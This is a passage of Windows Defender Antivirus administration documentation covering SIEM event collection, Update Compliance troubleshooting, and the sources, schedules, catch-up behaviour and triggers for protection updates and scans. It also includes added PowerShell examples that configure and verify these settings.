If you have a third-party security information and event management (SIEM) tool, you can also consume
Windows Defender client events.
Windows events comprise several security event sources, including Security Account Manager (SAM) events
(enhanced for Windows 10, also see the Security auditing topic) and Windows Defender events.
These events can be centrally aggregated using the Windows event collector. It is common practice for SIEMs to
have connectors for Windows events. This technique allows for correlation of all security events from the machine
in the SIEM.
You can also monitor malware events using the Malware Assessment solution in Log Analytics.
For monitoring or determining status with PowerShell, WMI, or Microsoft Azure, see the Deployment,
management, and reporting options table.
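The SIEM path described above (consuming Windows Defender client events from the Windows event log) as an added PowerShell example, not code from the original documentation. It reads the Operational log the same way an event collector or SIEM connector would and emits newline-delimited JSON; the 24-hour lookback and the EventData field names (Threat Name, Path, Detection User) are assumptions to check against your own events.

```powershell
# Added example: collect Windows Defender Antivirus events in a SIEM-friendly shape.
# Event IDs: 1116 malware detected, 1117 action taken, 5001 real-time protection
# disabled, 2001 security intelligence update failed.

$DefenderLog   = 'Microsoft-Windows-Windows Defender/Operational'
$WatchedEvents = @{
    1116 = 'MalwareDetected'
    1117 = 'MalwareActionTaken'
    5001 = 'RealTimeProtectionDisabled'
    2001 = 'SignatureUpdateFailed'
}

function Get-DefenderSecurityEvents {
    param([int]$LookbackHours = 24)   # window is an illustrative assumption

    $filter = @{
        LogName   = $DefenderLog
        Id        = [int[]]$WatchedEvents.Keys
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    }
    # Get-WinEvent raises an error (not an empty result) when nothing matches.
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Flatten the named EventData fields from the event XML; these are the
        # fields a SIEM parser keys on. Names assumed from typical 1116/1117 events.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            TimeCreated = $_.TimeCreated.ToUniversalTime().ToString('o')
            Computer    = $_.MachineName
            EventId     = $_.Id
            Category    = $WatchedEvents[$_.Id]
            ThreatName  = $data['Threat Name']
            Path        = $data['Path']
            User        = $data['Detection User']
            Message     = $_.Message
        }
    }
}

# One JSON object per line: a common ingest format for SIEM file/agent collectors.
Get-DefenderSecurityEvents -LookbackHours 24 | ForEach-Object { $_ | ConvertTo-Json -Compress }
```

A 5001 event with no matching re-enable, or a run of 2001 events on one VM, is the kind of record worth alerting on centrally, since the endpoint itself may be configured to suppress notifications.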

Related topics
Windows Defender Antivirus in Windows 10
Deploy Windows Defender Antivirus
Troubleshoot Windows Defender Antivirus reporting
in Update Compliance
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
When you use Windows Analytics Update Compliance to obtain reporting into the protection status of machines or
endpoints in your network that are using Windows Defender Antivirus, you may encounter problems or issues.
Typically, the most common indicators of a problem are:
You only see a small number or subset of all the devices you were expecting to see
You do not see any devices at all
The reports and information you do see is outdated (older than a few days)
For common error codes and event IDs related to the Windows Defender Antivirus service that are not related to
Update Compliance, see Windows Defender Antivirus events.
There are three steps to troubleshooting these problems:
1. Confirm that you have met all pre-requisites
2. Check your connectivity to the Windows Defender cloud-based service
3. Submit support logs

IMPORTANT
It typically takes 3 days for devices to start appearing in Update Compliance.

Confirm pre-requisites
In order for devices to properly show up in Update Compliance, you have to meet certain pre-requisites for both
the Update Compliance service and for Windows Defender Antivirus:
Endpoints are using Windows Defender Antivirus as the sole antivirus protection app. Using any other antivirus
app will cause Windows Defender AV to disable itself and the endpoint will not be reported in Update
Compliance.
Cloud-delivered protection is enabled.
Endpoints can connect to the Windows Defender AV cloud
If the endpoint is running Windows 10 version 1607 or earlier, Windows 10 diagnostic data must be set to the
Enhanced level.
It has been 3 days since all requirements have been met
If the above pre-requisites have all been met, you may need to proceed to the next step to collect diagnostic
information and send it to us.
Collect diagnostic data for Update Compliance troubleshooting
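The pre-requisite list above turned into a one-endpoint readiness check, as an added PowerShell example that is not part of the original documentation. It uses the Defender module and MpCmdRun.exe -ValidateMapsConnection; treating a zero exit code as success and the AllowTelemetry policy value as the diagnostic-data level are assumptions.

```powershell
# Added example: check the Update Compliance pre-requisites on one endpoint.
# Run elevated; returns one object with a boolean per pre-requisite.

function Test-UpdateComplianceReadiness {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    $build  = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber

    # 1. Windows Defender AV must be the sole, active antivirus (another AV
    #    product would have put it in passive/disabled mode).
    $soleAv = $status.AMServiceEnabled -and $status.AntivirusEnabled -and $status.RealTimeProtectionEnabled

    # 2. Cloud-delivered protection (MAPS) enabled: 0 = Disabled, 1 = Basic, 2 = Advanced.
    $cloudOn = $pref.MAPSReporting -gt 0

    # 3. The endpoint can actually reach the Windows Defender AV cloud.
    #    Assumption: a zero exit code from -ValidateMapsConnection means success.
    $mpcmd      = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
    $mapsOutput = & $mpcmd -ValidateMapsConnection 2>&1
    $cloudReachable = ($LASTEXITCODE -eq 0)

    # 4. On version 1607 (build 14393) or earlier, diagnostic data must be
    #    Enhanced (2) or higher. Assumption: read from the AllowTelemetry policy value.
    $needsEnhanced = $build -le 14393
    $telemetry = (Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection' `
                   -Name AllowTelemetry -ErrorAction SilentlyContinue).AllowTelemetry
    $telemetryOk = (-not $needsEnhanced) -or ($null -ne $telemetry -and $telemetry -ge 2)

    [pscustomobject]@{
        SoleAntivirus     = [bool]$soleAv
        CloudProtectionOn = [bool]$cloudOn
        CloudReachable    = [bool]$cloudReachable
        DiagnosticDataOk  = [bool]$telemetryOk
        SignatureAgeDays  = $status.AntivirusSignatureAge
        MapsCheckOutput   = ($mapsOutput | Out-String).Trim()
    }
}

$result = Test-UpdateComplianceReadiness
$failed = $result.PSObject.Properties |
          Where-Object { $_.Value -is [bool] -and -not $_.Value } |
          Select-Object -ExpandProperty Name
if ($failed) {
    "Pre-requisites not met: $($failed -join ', ')"
} else {
    'All pre-requisites met; allow 3 days before expecting this device in Update Compliance.'
}
```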

Related topics
Windows Defender Antivirus in Windows 10
Deploy Windows Defender Antivirus
Manage Windows Defender Antivirus updates and
apply baselines
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
There are two types of updates related to keeping Windows Defender Antivirus up to date:
1. Protection updates
2. Product updates
You can also apply Windows security baselines to quickly bring your endpoints up to a uniform level of
protection.

Protection updates
Windows Defender Antivirus uses both cloud-delivered protection (also called the Microsoft Advanced
Protection Service or MAPS) and periodically downloaded protection updates to provide protection. These
protection updates are also known as Security intelligence updates.
The cloud-delivered protection is always on and requires an active connection to the Internet to function, while
the protection updates generally occur once a day (although this can be configured). See the Utilize Microsoft
cloud-provided protection in Windows Defender Antivirus topic for more details about enabling and
configuring cloud-provided protection.

Product updates
Windows Defender Antivirus requires monthly updates (known as "engine updates" and "platform updates"),
and will receive major feature updates alongside Windows 10 releases.
You can manage the distribution of updates through Windows Server Update Service (WSUS), with System
Center Configuration Manager, or in the normal manner that you deploy Microsoft and Windows updates to
endpoints in your network.

In this section
TOPIC: DESCRIPTION

Manage how protection updates are downloaded and applied: Protection updates can be delivered through a number of sources.

Manage when protection updates should be downloaded and applied: You can schedule when protection updates should be downloaded.

Manage updates for endpoints that are out of date: If an endpoint misses an update or scheduled scan, you can force an update or scan at the next log on.

Manage event-based forced updates: You can set protection updates to be downloaded at startup or after certain cloud-delivered protection events.

Manage updates for mobile devices and virtual machines (VMs): You can specify settings, such as whether updates should occur on battery power, that are especially useful for mobile devices and virtual machines.
Manage the sources for Windows Defender Antivirus protection updates
4/5/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
There are two components to managing protection updates - where the updates are downloaded from, and
when updates are downloaded and applied.
This topic describes where you can specify the updates should be downloaded from, also known as the fallback
order.
See Manage Windows Defender Antivirus updates and apply baselines topic for an overview on how updates
work, and how to configure other aspects of updates (such as scheduling updates).
There are five locations where you can specify where an endpoint should obtain updates. Typically, you would
configure endpoints to individually download the updates from a primary source, followed by the other sources
in order of priority based on your network configuration.
Updates will be obtained from the sources in the order you specify. If a source is not available, the next source in
the list will be used.
You can use the following sources:
Microsoft Update
Windows Server Update Service (WSUS )
System Center Configuration Manager
A network file share
The Microsoft Malware Protection Center Security intelligence page (MMPC )
When updates are published, some logic will be applied to minimize the size of the update. In most cases, only
the "delta" (or the differences between the latest update and the update that is currently installed on the
endpoint) will be downloaded and applied. However, the size of the delta depends on:
How old the current update on the endpoint is
Which source you use
The older the updates on an endpoint, the larger the download. However, you must also consider frequency
versus size - a more frequent update schedule may result in more ad hoc network usage, while a less-frequent
schedule may result in larger file sizes.
Microsoft Update allows for rapid releases, which means it will download small deltas on a frequent basis. This
ensures the best protection, but may increase network bandwidth.
The WSUS, Configuration Manager, and MMPC sources will deliver less frequent updates. The size of the
updates may be slightly larger than the frequent release from Microsoft Update (as the delta, or differences
between the latest version and what is on the endpoint will be larger). This ensures consistent protection without
increasing ad hoc network usage (although the amount of data may be the same or increased as the updates will
be fewer, but may be slightly larger).
IMPORTANT
If you have set MMPC as a fallback source after WSUS or Microsoft Update, updates will only be downloaded from MMPC
when the current update is considered to be out-of-date (by default, this is 2 consecutive days of not being able to apply
updates from the WSUS or Microsoft Update services). You can, however, set the number of days before protection is
reported as out-of-date.

Each source has typical scenarios that depend on how your network is configured, in addition to how often they
publish updates, as described in the following table:

LOCATION: SAMPLE SCENARIO

WSUS: You are using WSUS to manage updates for your network.

Microsoft Update: You want your endpoints to connect directly to Microsoft Update. This can be useful for endpoints that irregularly connect to your enterprise network, or if you do not use WSUS to manage your updates.

File share: You have non-Internet-connected devices (such as VMs). You can use your Internet-connected VM host to download the updates to a network share, from which the VMs can obtain the updates. See the VDI deployment guide for how file shares can be used in virtual desktop infrastructure (VDI) environments.

Configuration Manager: You are using System Center Configuration Manager to update your endpoints.

MMPC: You need to download the latest protection updates because of a recent infection or to help provision a strong, base image for VDI deployment. This option should generally be used only as a final fallback source, and not the primary source. It will only be used if updates cannot be downloaded from WSUS or Microsoft Update for a specified number of days.

You can manage the order in which update sources are used with Group Policy, System Center Configuration
Manager, PowerShell cmdlets, and WMI.

IMPORTANT
If you set WSUS as a download location, you must approve the updates - regardless of what management tool you use to
specify the location. You can set up an automatic approval rule with WSUS, which may be useful as updates arrive at least
once a day. See To synchronize endpoint protection updates in standalone WSUS for more details.

The procedures in this article first describe how to set the order, and then how to set up the File share option if
you have enabled it.
Use Group Policy to manage the update location:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender > Signature updates and configure
the following settings:
a. Double-click the Define the order of sources for downloading definition updates setting and
set the option to Enabled.
b. Enter the order of sources, separated by a single pipe, for example:
InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC
c. Click OK. This will set the order of protection update sources.
d. Double-click the Define file shares for downloading definition updates setting and set the
option to Enabled.
e. Enter the file share source. If you have multiple sources, enter each source in the order they should
be used, separated by a single pipe. Use standard UNC notation for denoting the path, for example:
\\host-name1\share-name\object-name|\\host-name2\share-name\object-name . If you do not enter any
paths then this source will be skipped when the endpoint downloads updates.
f. Click OK. This will set the order of file shares when that source is referenced in the Define the
order of sources... group policy setting.
Use Configuration Manager to manage the update location:
See Configure Security intelligence Updates for Endpoint Protection for details on configuring System Center
Configuration Manager (current branch).
Use PowerShell cmdlets to manage the update location:
Use the following PowerShell cmdlets to set the update order (the second parameter is spelled
SignatureDefinitionUpdateFileSharesSources; older copies of this page show it with a typo).
Set-MpPreference -SignatureFallbackOrder {LOCATION|LOCATION|LOCATION|LOCATION}
Set-MpPreference -SignatureDefinitionUpdateFileSharesSources {\\UNC SHARE PATH|\\UNC SHARE PATH}

See the following for more information:
Set-MpPreference -SignatureFallbackOrder
Set-MpPreference -SignatureDefinitionUpdateFileSharesSources
Use PowerShell cmdlets to configure and run Windows Defender Antivirus
Defender cmdlets
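The following script is an added example (not from the original page) that puts the two cmdlets together: it sets a fallback order that ends with MMPC, configures two file shares, reads the result back, warns when FileShares is listed without any share paths, and then forces one update from a chosen source so the new configuration can be tested immediately. The share paths and the chosen order are placeholders.

```powershell
# Added example (not from the original page): configure and verify protection
# update sources. Run in an elevated Windows PowerShell session.

# Source names accepted by -SignatureFallbackOrder:
#   InternalDefinitionUpdateServer (WSUS / Configuration Manager)
#   MicrosoftUpdateServer
#   FileShares   (uses -SignatureDefinitionUpdateFileSharesSources)
#   MMPC         (should be the final fallback, per the guidance above)
$order  = 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|FileShares|MMPC'
# Placeholder UNC paths; replace with real shares in your environment
$shares = '\\fileserver01\DefenderUpdates|\\fileserver02\DefenderUpdates'

Set-MpPreference -SignatureFallbackOrder $order
Set-MpPreference -SignatureDefinitionUpdateFileSharesSources $shares

# Read back: both values are stored as single pipe-separated strings
$p = Get-MpPreference
"Fallback order : $($p.SignatureFallbackOrder)"
"File shares    : $($p.SignatureDefinitionUpdateFileSharesSources)"

# Misconfiguration check: FileShares in the order with no paths is silently skipped
if ($p.SignatureFallbackOrder -match 'FileShares' -and
    [string]::IsNullOrEmpty($p.SignatureDefinitionUpdateFileSharesSources)) {
    Write-Warning 'FileShares is in the fallback order but no share paths are configured.'
}

# Force an update from one specific source now, bypassing the fallback order.
# Useful to prove a new share works, or after an infection (MMPC).
Update-MpSignature -UpdateSource MicrosoftUpdateServer

# Confirm what is installed afterwards
Get-MpComputerStatus |
    Select-Object AntivirusSignatureVersion, AntivirusSignatureLastUpdated, AMEngineVersion
```

Update-MpSignature -UpdateSource accepts the same four source names, so the same script can be pointed at FileShares or MMPC to validate each step of the chain independently.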
Use Windows Management Instrumentation (WMI) to manage the update location:
Use the Set method of the MSFT_MpPreference class for the following properties:
SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSources

See the following for more information:
Windows Defender WMIv2 APIs
Use Mobile Device Management (MDM ) to manage the update location:
See Policy CSP - Defender/SignatureUpdateFallbackOrder for details on configuring MDM.

Related topics
Deploy Windows Defender Antivirus
Manage Windows Defender Antivirus updates and apply baselines
Manage updates for endpoints that are out of date
Manage event-based forced updates
Manage updates for mobile devices and VMs
Windows Defender Antivirus in Windows 10
Manage the schedule for when protection updates should be downloaded and applied
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus lets you determine when it should look for and download updates.
You can schedule updates for your endpoints by:
Specifying the day of the week to check for protection updates
Specifying the interval to check for protection updates
Specifying the time to check for protection updates
You can also randomize the times when each endpoint checks and downloads protection updates. See the
Schedule scans topic for more information.
Use Configuration Manager to schedule protection updates:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Definition updates section.
3. To check and download updates at a certain time:
a. Set Check for Endpoint Protection definitions at a specific interval... to 0.
b. Set Check for Endpoint Protection definitions daily at... to the time when updates should be
checked.
4. To check and download updates on a continual interval, Set Check for Endpoint Protection definitions
at a specific interval... to the number of hours that should occur between updates.
5. Deploy the updated policy as usual.
Use Group Policy to schedule protection updates:

IMPORTANT
By default, Windows Defender Antivirus will check for an update 15 minutes before the time of any scheduled scans.
Enabling these settings will override that default.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates and
configure the following settings:
a. Double-click the Specify the interval to check for definition updates setting and set the option to
Enabled. Enter the number of hours between updates. Click OK.
b. Double-click the Specify the day of the week to check for definition updates setting and set the
option to Enabled. Enter the day of the week to check for updates. Click OK.
c. Double-click the Specify the time to check for definition updates setting and set the option to
Enabled. Enter the time when updates should be checked. The time is based on the local time of the
endpoint. Click OK.
Use PowerShell cmdlets to schedule protection updates:
Use the following cmdlets:

Set-MpPreference -SignatureScheduleDay
Set-MpPreference -SignatureScheduleTime
Set-MpPreference -SignatureUpdateInterval
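The following is an added example (not from the original page) wrapping the three cmdlets above in a small set-and-verify pair. It also turns on schedule randomization, which the Schedule scans topic mentions, so a fleet does not all contact the update source at the same minute. The chosen day, time and interval are placeholders.

```powershell
# Added example (not from the original page): schedule protection-update checks
# and read the effective schedule back. Run in an elevated session.

# Get-MpPreference reports SignatureScheduleDay numerically:
#   0 = Everyday, 1..7 = Sunday..Saturday, 8 = Never
$dayNames = @('Everyday','Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Never')

function Set-SignatureCheckSchedule {
    param(
        [ValidateSet('Everyday','Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Never')]
        [string]$Day = 'Everyday',
        # Local time on the endpoint; the "HH:mm:ss" form matches what Get-MpPreference displays
        [string]$Time = '02:00:00',
        # Hours between interval checks, in addition to the daily time (1-24)
        [ValidateRange(1, 24)][int]$IntervalHours = 4
    )
    Set-MpPreference -SignatureScheduleDay $Day `
                     -SignatureScheduleTime $Time `
                     -SignatureUpdateInterval $IntervalHours
    # Spread scheduled task times across endpoints instead of firing at the same minute
    Set-MpPreference -RandomizeScheduleTaskTimes $true
}

function Get-SignatureCheckSchedule {
    $p = Get-MpPreference
    [pscustomobject]@{
        Day           = $dayNames[[int]$p.SignatureScheduleDay]
        Time          = $p.SignatureScheduleTime
        IntervalHours = $p.SignatureUpdateInterval
        Randomized    = $p.RandomizeScheduleTaskTimes
    }
}

Set-SignatureCheckSchedule -Day Everyday -Time '02:00:00' -IntervalHours 4
Get-SignatureCheckSchedule
```

Remember the IMPORTANT note under the Group Policy procedure: once any of these values is set, the default "15 minutes before a scheduled scan" check no longer applies, so pair this schedule with the CheckForSignaturesBeforeRunningScan setting described in the event-based updates topic if you still want fresh protection before each scan.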

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to schedule protection updates:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureScheduleDay
SignatureScheduleTime
SignatureUpdateInterval

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Related topics
Deploy Windows Defender Antivirus
Manage Windows Defender Antivirus updates and apply baselines
Manage updates for endpoints that are out of date
Manage event-based forced updates
Manage updates for mobile devices and virtual machines (VMs)
Windows Defender Antivirus in Windows 10
Manage Windows Defender Antivirus updates and scans for endpoints that are out of date
4/5/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus lets you define how long an endpoint can avoid an update or how many scans it
can miss before it is required to update and scan itself. This is especially useful in environments where devices
are not often connected to a corporate or external network, or devices that are not used on a daily basis.
For example, an employee that uses a particular PC is on break for three days and does not log on to their PC
during that time.
When the user returns to work and logs on to their PC, Windows Defender Antivirus will immediately check and
download the latest protection updates, and run a scan.

Set up catch-up protection updates for endpoints that haven't updated for a while
If Windows Defender Antivirus did not download protection updates for a specified period, you can set it up to
automatically check and download the latest update at the next log on. This is useful if you have globally disabled
automatic update downloads on startup.
Use Configuration Manager to configure catch-up protection updates:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Definition updates section and configure the following settings:
a. Set Force a definition update if the client computer is offline for more than two consecutive
scheduled updates to Yes.
b. For the If Configuration Manager is used as a source for definition updates..., specify the hours
before which the protection updates delivered by Configuration Manager should be considered out-
of-date. This will cause the next update location to be used, based on the defined fallback source order.
3. Click OK.
4. Deploy the updated policy as usual.
Use Group Policy to enable and configure the catch-up update feature:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates.
5. Double-click the Define the number of days after which a catch-up definition update is required
setting and set the option to Enabled. Enter the number of days after which you want Windows Defender
AV to check for and download the latest protection update.
6. Click OK.
Use PowerShell cmdlets to configure catch-up protection updates:
Use the following cmdlets:

Set-MpPreference -SignatureUpdateCatchupInterval
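The following is an added example (not from the original page). It sets the catch-up interval twice, once with the cmdlet and once through the static Set method of the MSFT_MpPreference WMI class that the cmdlet wraps, reads the value back through WMI, and then adds the operational check a practitioner usually wants alongside this setting: if the installed protection is already older than a threshold, update now instead of waiting for the next logon. The thresholds are placeholders.

```powershell
# Added example (not from the original page): catch-up update interval via
# cmdlet and via WMI, plus an age check. Run in an elevated session.

$CatchupDays = 1   # days without an update before the next logon forces one

# Cmdlet form
Set-MpPreference -SignatureUpdateCatchupInterval $CatchupDays

# WMI form: the same property passed to the static Set method of MSFT_MpPreference.
# This is what the cmdlet calls underneath, and it is the form to use from
# non-PowerShell management tooling.
Invoke-CimMethod -Namespace 'root/Microsoft/Windows/Defender' `
                 -ClassName 'MSFT_MpPreference' `
                 -MethodName 'Set' `
                 -Arguments @{ SignatureUpdateCatchupInterval = [uint32]$CatchupDays } | Out-Null

# Read back through WMI to confirm both paths landed on the same value
$wmiPref = Get-CimInstance -Namespace 'root/Microsoft/Windows/Defender' -ClassName 'MSFT_MpPreference'
"Catch-up interval (days): $($wmiPref.SignatureUpdateCatchupInterval)"

# Operational check: Get-MpComputerStatus reports signature age in whole days.
# Anything older than $MaxAgeDays gets an update now rather than at next logon.
$MaxAgeDays = 3   # placeholder threshold for this example
$status = Get-MpComputerStatus
$age = [Math]::Max($status.AntivirusSignatureAge, $status.AntispywareSignatureAge)
if ($age -gt $MaxAgeDays) {
    Write-Warning "Protection is $age days old (limit $MaxAgeDays); forcing an update."
    Update-MpSignature
    $status = Get-MpComputerStatus
}
$status | Select-Object AntivirusSignatureVersion, AntivirusSignatureAge, AntispywareSignatureAge
```

The catch-up interval only triggers at logon, so on servers and kiosks that rarely see an interactive logon the age check at the end is the part that actually does the work.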

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to configure catch-up protection updates:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureUpdateCatchupInterval

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Set the number of days before protection is reported as out-of-date
You can also specify the number of days after which Windows Defender Antivirus protection is considered old or
out-of-date. After the specified number of days, the client will report itself as out-of-date, and show an error to
the user of the PC. It may also cause Windows Defender Antivirus to attempt to download an update from other
sources (based on the defined fallback source order), such as when using MMPC as a secondary source after
setting WSUS or Microsoft Update as the first source.
Use Group Policy to specify the number of days before protection is considered out-of-date:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates
and configure the following settings:
a. Double-click Define the number of days before spyware definitions are considered out of
date and set the option to Enabled. Enter the number of days after which you want Windows
Defender AV to consider spyware Security intelligence to be out-of-date.
b. Click OK.
c. Double-click Define the number of days before virus definitions are considered out of date
and set the option to Enabled. Enter the number of days after which you want Windows Defender
AV to consider virus Security intelligence to be out-of-date.
d. Click OK.

Set up catch-up scans for endpoints that have not been scanned for a
while
You can set the number of consecutive scheduled scans that can be missed before Windows Defender Antivirus
will force a scan.
The process for enabling this feature is:
1. Set up at least one scheduled scan (see the Schedule scans topic).
2. Enable the catch-up scan feature.
3. Define the number of scans that can be skipped before a catch-up scan occurs.
This feature can be enabled for both full and quick scans.
Use Group Policy to enable and configure the catch-up scan feature:
1. Ensure you have set up at least one scheduled scan.
2. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
3. In the Group Policy Management Editor go to Computer configuration.
4. Click Policies then Administrative templates.
5. Expand the tree to Windows components > Windows Defender Antivirus > Scan and configure the
following settings:
a. If you have set up scheduled quick scans, double-click the Turn on catch-up quick scan setting and
set the option to Enabled.
b. If you have set up scheduled full scans, double-click the Turn on catch-up full scan setting and set
the option to Enabled. Click OK.
c. Double-click the Define the number of days after which a catch-up scan is forced setting and set
the option to Enabled.
d. Enter the number of scans that can be missed before a scan will be automatically run when the user
next logs on to the PC. The type of scan that is run is determined by the Specify the scan type to use
for a scheduled scan (see the Schedule scans topic). Click OK.

NOTE
The Group Policy setting title refers to the number of days. The setting, however, is applied to the number of scans (not
days) before the catch-up scan will be run.

Use PowerShell cmdlets to configure catch-up scans:
Use the following cmdlets:

Set-MpPreference -DisableCatchupFullScan
Set-MpPreference -DisableCatchupQuickScan
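The following is an added example (not from the original page) that walks the three-step process above with PowerShell: it creates a scheduled scan, enables the catch-up scan for both scan types (note that the settings are Disable* flags, so $false turns catch-up on), reads the result back, and finally starts a scan immediately on a machine that has clearly been missing its schedule. The schedule and the age threshold are placeholders.

```powershell
# Added example (not from the original page): scheduled scan + catch-up scan +
# scan-age check. Run in an elevated session.

# Step 1: a scheduled scan. -ScanParameters is QuickScan or FullScan;
# -ScanScheduleDay takes the same values as -SignatureScheduleDay.
Set-MpPreference -ScanParameters FullScan -ScanScheduleDay Sunday -ScanScheduleTime '03:00:00'
# Quick scans have their own daily time, independent of the full-scan schedule
Set-MpPreference -ScanScheduleQuickScanTime '12:00:00'

# Step 2 and 3: the catch-up settings are "Disable*" flags, so $false turns them ON.
# The number of missed scans before a catch-up runs is Group Policy only (see above).
Set-MpPreference -DisableCatchupFullScan $false -DisableCatchupQuickScan $false

$p = Get-MpPreference
# Get-MpPreference reports ScanParameters numerically: 1 = quick scan, 2 = full scan
$scanTypeName = @{ 1 = 'QuickScan'; 2 = 'FullScan' }[[int]$p.ScanParameters]
[pscustomobject]@{
    ScheduledScanType  = $scanTypeName
    ScheduledDay       = $p.ScanScheduleDay
    ScheduledTime      = $p.ScanScheduleTime
    CatchupFullScanOn  = -not $p.DisableCatchupFullScan
    CatchupQuickScanOn = -not $p.DisableCatchupQuickScan
}

# Age check: Get-MpComputerStatus reports days since the last scan of each type.
# Start-MpScan blocks until the scan finishes, so run this from a management job.
$maxFullScanAgeDays = 14   # placeholder threshold for this example
$s = Get-MpComputerStatus
if ($s.FullScanAge -gt $maxFullScanAgeDays) {
    Write-Warning "Last full scan was $($s.FullScanAge) days ago; starting one now."
    Start-MpScan -ScanType FullScan
}
```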

See Use PowerShell cmdlets to manage Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to configure catch-up scans:
Use the Set method of the MSFT_MpPreference class for the following properties:
DisableCatchupFullScan
DisableCatchupQuickScan

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs
Use Configuration Manager to configure catch-up scans:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Scheduled scans section and set Force a scan of the selected scan type if client
computer is offline... to Yes.
3. Click OK.
4. Deploy the updated policy as usual.

Related topics
Deploy Windows Defender Antivirus
Manage Windows Defender Antivirus updates and apply baselines
Manage when protection updates should be downloaded and applied
Manage event-based forced updates
Manage updates for mobile devices and virtual machines (VMs)
Windows Defender Antivirus in Windows 10
Manage event-based forced updates
4/30/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus allows you to determine if updates should (or should not) occur after certain
events, such as at startup or after receiving specific reports from the cloud-delivered protection service.

Check for protection updates before running a scan
You can use System Center Configuration Manager, Group Policy, PowerShell cmdlets, and WMI to force
Windows Defender Antivirus to check and download protection updates before running a scheduled scan.
Use Configuration Manager to check for protection updates before running a scan:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Scheduled scans section and set Check for the latest definition updates before running a
scan to Yes.
3. Click OK.
4. Deploy the updated policy as usual.
Use Group Policy to check for protection updates before running a scan:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Scan.
5. Double-click Check for the latest virus and spyware definitions before running a scheduled scan
and set the option to Enabled.
6. Click OK.
Use PowerShell cmdlets to check for protection updates before running a scan:
Use the following cmdlets:

Set-MpPreference -CheckForSignaturesBeforeRunningScan

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to check for protection updates before running a scan:
Use the Set method of the MSFT_MpPreference class for the following properties:
CheckForSignaturesBeforeRunningScan

See the following for more information:


Windows Defender WMIv2 APIs

Check for protection updates on startup
You can use Group Policy to force Windows Defender Antivirus to check and download protection updates when
the machine is started.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates.
5. Double-click Check for the latest virus and spyware definitions on startup and set the option to
Enabled.
6. Click OK.
You can also use Group Policy, PowerShell, or WMI to configure Windows Defender Antivirus to download
